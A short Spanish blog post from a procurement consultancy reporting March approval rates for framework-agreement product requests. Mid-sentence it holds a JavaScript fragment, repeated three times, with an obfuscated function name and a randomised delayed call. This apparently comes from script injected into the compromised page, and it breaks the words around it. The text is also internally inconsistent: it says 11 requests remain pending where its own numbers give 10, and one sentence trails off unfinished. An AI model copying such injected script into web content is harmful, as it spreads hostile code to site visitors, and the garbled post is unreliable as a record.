89,5% de las solicitudes respondidas fueron aprobadas en marzo

Publicada en Publicada en Asesorias

En su mayoría las solicitudes fueron para nuevos productos, donde el convenio marco con mayor cantidad de solicitudes fue

Durante el mes de marzo nuestra área de Operaciones de CGCE Asesorías en Licitaciones y Convenio Marco, envió un total de 29 solicitudes de las cuales 19 recibieron respuesta.

 

De las 19 solicitudes enviadas, 17 fueron aceptadas dandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando como resultado que el 89.5% de las solicitudes respondidas fueron aprobadas. Las 11 restantes del total enviadas, se encuentran en estado pendiente de respuesta.

 

Estos requerimientos fueron enviados para los convenios de alimentos, deportes, material didáctico, neumáticos, insumos médicos, data center, mobiliario y hardware donde en su mayoría fueron para subir productos nuevos.

 

CGCE Asesorías te invita a conocer más sobre nuestros servicios.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *